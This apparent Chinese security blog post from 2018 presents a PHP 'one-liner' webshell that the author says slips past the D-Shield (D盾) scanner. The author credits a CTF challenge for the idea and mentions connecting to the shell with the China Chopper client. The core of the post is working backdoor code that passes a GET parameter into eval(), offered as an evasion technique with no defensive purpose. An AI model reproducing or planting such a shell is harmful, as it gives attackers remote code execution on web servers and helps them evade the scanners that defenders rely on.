从一道CTF题得到的思路从而产生的过D盾一句话
前言
这个过D盾的一句话纯属是我瞎搞,搞出来的。= =我也一脸懵逼怎么就过了= =
正文
D盾的最新版的,php环境是5.6的
代码:
<?php
error_reporting(0);
$u=$_GET['u'];
$i=$_GET['i'];
if ($u=!"a"){
die('die....');
}
@eval("echo $i");
?>
测试结果:
菜刀连接(这配置自己弄的好像有毛病)
视频:
推荐一篇文章:那些强悍的PHP一句话后门 - FreeBuf互联网安全新媒体平台
转载请声明:转自422926799.github.io
转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。
文章标题:从一道CTF题得到的思路从而产生的过D盾一句话
本文作者:九世
发布时间:2018-12-01, 19:16:21
最后更新:2019-04-19, 20:36:16
原始链接:http://jiushill.github.io/posts/7379a7c9.html版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。